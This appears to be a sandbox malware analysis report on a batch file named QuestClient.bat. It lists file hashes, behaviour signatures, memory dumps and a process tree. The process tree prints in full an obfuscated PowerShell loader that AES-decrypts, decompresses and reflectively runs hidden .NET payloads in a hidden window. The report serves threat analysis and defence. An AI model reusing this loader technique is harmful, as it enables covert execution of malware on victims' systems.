Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    14/08/2024, 17:48

General

  • Target

    QuestClient.bat

  • Size

    456KB

  • MD5

    c2cd34623e825a5da3bd0c3c6a7cc7a0

  • SHA1

    1ce81a2392bff443e04b97a9ff76e0316c1ca850

  • SHA256

    70c57f82283c07c45bca13b478c4f03bb81387e1d4b3945fc3e6c2483e878bc8

  • SHA512

    ba0895bee303d9ff1e268b7cc512bc903a12465b6737f21594107d040592f8210b83c26bae3c0f6d0b9a12fd98f8702305a4b3b409a6b63b15c9b2a8d0b34ecf

  • SSDEEP

    12288:Ve9+GI3rpF00cj8PF4617iCV1sYJKyoS4osZcD48:Ve9vI3FqgmCRoLosWDD

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\QuestClient.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3056
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MqCXbwte9uhPYEg+s1sfkk76fVMEhUBYBUcawnYJBSM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JloX3aFz+GqYGWzFbTGvHw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Sniec=New-Object System.IO.MemoryStream(,$param_var); $ThfXY=New-Object System.IO.MemoryStream; $dRvPt=New-Object System.IO.Compression.GZipStream($Sniec, [IO.Compression.CompressionMode]::Decompress); $dRvPt.CopyTo($ThfXY); $dRvPt.Dispose(); $Sniec.Dispose(); $ThfXY.Dispose(); $ThfXY.ToArray();}function execute_function($param_var,$param2_var){ $yULDO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pPFbC=$yULDO.EntryPoint; $pPFbC.Invoke($null, $param2_var);}$FirRg = 'C:\Users\Admin\AppData\Local\Temp\QuestClient.bat';$host.UI.RawUI.WindowTitle = $FirRg;$xKJqy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FirRg).Split([Environment]::NewLine);foreach ($nlfgl in $xKJqy) { if ($nlfgl.StartsWith('wycXuQhiigqSLUkYJLaD')) { $nKIZB=$nlfgl.Substring(20); break; }}$payloads_var=[string[]]$nKIZB.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      2⤵
        PID:2328
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1904

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1904-4-0x000007FEF5B7E000-0x000007FEF5B7F000-memory.dmp

      Filesize

      4KB

    • memory/1904-7-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

      Filesize

      9.6MB

    • memory/1904-9-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

      Filesize

      9.6MB

    • memory/1904-8-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

      Filesize

      9.6MB

    • memory/1904-6-0x0000000002770000-0x0000000002778000-memory.dmp

      Filesize

      32KB

    • memory/1904-5-0x000000001B580000-0x000000001B862000-memory.dmp

      Filesize

      2.9MB

    • memory/1904-11-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

      Filesize

      9.6MB

    • memory/1904-10-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

      Filesize

      9.6MB

    • memory/1904-12-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

      Filesize

      9.6MB